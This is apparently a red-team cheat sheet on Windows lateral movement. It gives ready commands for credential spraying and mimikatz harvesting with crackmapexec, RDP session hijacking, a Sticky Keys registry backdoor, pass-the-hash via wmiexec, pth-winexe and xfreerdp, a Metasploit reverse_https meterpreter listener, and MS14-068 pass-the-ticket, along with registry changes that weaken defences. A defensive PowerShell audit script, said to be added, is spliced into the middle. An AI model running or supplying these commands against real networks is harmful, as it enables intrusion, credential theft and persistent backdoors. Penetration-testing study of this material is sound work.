To check whether the credentials $USER / $PASSWORD are also valid on other computers in the network:
crackmapexec $IP/24 -u $USER -p $PASSWORD --lusers
Or, using an Administrator hash, execute Mimikatz to gather plaintext passwords:
crackmapexec $IP/24 -u Administrator -H $HASH -d $DOMAIN -m modules/credentials/mimikatz.py
Run PowerView commands through crackmapexec:
crackmapexec smb $IP -d $DOMAIN -u $LOGIN -p $PASS -M powerview -o COMMAND="Get-NetDomain" --verbose
Tunneling
Traffic encapsulation tools to bypass deep packet inspection:
http_tunnel
stunnel
Lateral movement with RDP
Exploitation RDP 2011
Technique:
Any user on a local system with NT AUTHORITY\SYSTEM privileges can take over any RDP session opened from that machine without knowing the credentials (roughly like "su - user" as root on Linux).
The legitimate user is logged out immediately.
This can be done from Task Manager as administrator (right click the session, Connect) or with tscon.exe / tsadmin.msc.
Method 1
psexec -s \\localhost cmd
Method 2
query user
sc create sesshijack binpath="cmd.exe /k tscon $ID /dest:$SESSIONNAME"
net start sesshijack
Method 3 (with a password as a normal user, and without a password as a SYSTEM user)
query user
or:
quser
tscon $ID
Method 4 (physical access, boot backdoor)
Sticky Keys (sethc.exe)
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
Reboot, then at the login screen press a key five times to trigger Sticky Keys (or press F5).
Lateral movement with PTH (Pass The Hash)
Requirement:
SMB connections over ports 139/445 to a writeable share (e.g. C$, ADMIN$)
PTH from Linux
SMB
pth-winexe -U $DOMAIN/administrator%$LM_HASH:$NT_HASH //$IP cmd
crackmapexec --exec-method=smbexec -u Administrator -H $HASH -x cmd.exe $IP
python wmiexec.py -hashes :$HASH $USER@$HOST
MS SQL
pth-sqsh -D$DATABASE_NAME -S$IP -U$SERVER_INSTANCE\\$USERNAME -mpretty
RDP
xfreerdp /u:$USER /d:$DOMAIN /pth:$NTLM /v:$IP:3389
Metasploit
msf> use exploit/windows/smb/psexec
Crackmapexec + Meterpreter
First, start meterpreter listener:
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_https
msf> set LHOST $LOCALIP
msf> set ExitOnSession false
msf> exploit -j
crackmapexec $IP -u administrator -p $PASS -M metinject -o LHOST=$LOCALIP LPORT=444
Crackmapexec + Empire
python empire --rest --user empireadmin --pass Password123!
Edit ~/.cme/cme.conf:
[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!
[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123
crackmapexec $IP/24 -u username -p password -M empire_exec -o LISTENER=test
PTH from Windows
On Windows, use mimikatz or Impacket's wmiexec.
PTH with mimikatz:
mimikatz.exe
mimikatz# privilege::debug
mimikatz# sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$HASH
That should open a cmd.exe on the target machine.
Check hashes against network
medusa -C pwdump.jd -M smbnt -H smb_hosts2.txt -m PASS:HASH -t 20 -T 10 2> /dev/null | tee medusa.smbnt
crackmapexec $IP/24 -u Administrator -H $HASH
2018 update
Problems with defence systems: UAC and related registry settings
SMB signing required (seen as STATUS_ACCESS_DENIED): "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature" = 0
WDigest authentication: "SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"
UAC remote restriction: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy" = 1
Passing the hash does not work in all cases. For example, Windows Defender Credential Guard protects against this.
You wouldn’t even be able to pass the Administrator hash. You would need to turn off Windows Defender first.
Additionally, you might have to edit the Registry.
Windows operating systems starting with Vista have a User Account Control (UAC) policy setting that disallows other local administrators from running privileged tasks across the network. If you want to pass the hash of another local admin, you could disable the restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System and creating a DWORD entry of LocalAccountTokenFilterPolicy with a value of 1.
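A defender-side audit of the settings this section and the Sticky Keys method name, added here as an example and not part of the original notes: it reads LocalAccountTokenFilterPolicy, RequireSecuritySignature, WDigest UseLogonCredential and the sethc.exe IFEO Debugger value and flags the state that weakens the host. It assumes an elevated PowerShell session on the host being audited; the check names and weak/OK rules are the example's own.

```powershell
# Added example (not from the original notes): audit the registry settings this page lists.
# Run in an elevated PowerShell session on the host to audit; prints one row per check.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # key or value absent
}

$checks = @(
    @{ Name = 'LocalAccountTokenFilterPolicy (UAC remote restriction)'
       Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
       Key  = 'LocalAccountTokenFilterPolicy'
       # 1 gives every local admin a full token over the network; absent or 0 is the hardened default
       Weak = { param($v) $v -eq 1 } },
    @{ Name = 'SMB server signing (RequireSecuritySignature)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'
       Key  = 'RequireSecuritySignature'
       # anything other than 1 means signing is not enforced
       Weak = { param($v) $v -ne 1 } },
    @{ Name = 'WDigest UseLogonCredential'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
       Key  = 'UseLogonCredential'
       # 1 keeps plaintext credentials in LSASS, which is what the mimikatz module above harvests
       Weak = { param($v) $v -eq 1 } },
    @{ Name = 'IFEO Debugger on sethc.exe (Sticky Keys backdoor)'
       Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
       Key  = 'Debugger'
       # a legitimate host has no Debugger value on sethc.exe at all
       Weak = { param($v) $null -ne $v } }
)

$results = foreach ($c in $checks) {
    $value = Get-RegValue -Path $c.Path -Name $c.Key
    [pscustomobject]@{
        Check  = $c.Name
        Value  = if ($null -eq $value) { '<not set>' } else { $value }
        Status = if (& $c.Weak $value) { 'WEAK' } else { 'OK' }
    }
}
$results | Format-Table -AutoSize
```

Any row marked WEAK corresponds to one of the conditions this section says makes pass-the-hash or the Sticky Keys backdoor possible, so it is the setting to remediate or to alert on when it changes.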
Lateral movement with PTT (Pass The Ticket)
The attack targets the DC with a valid user and NTLM hash.
whoami /user
python ms14-068.py -u $USER@$DOMAIN -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc --rc4 <ntlmHash>
python ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> --rc4 <ntlmHash>
klist
klist purge
mimikatz.exe "kerberos::ptc $CCACHE_FILE" exit   # the generated ticket file must be injected into memory
klist
net use \\$PDC\admin$
net use k: \\$PDC\c$
psexec \\$PDC cmd.exe
whoami /groups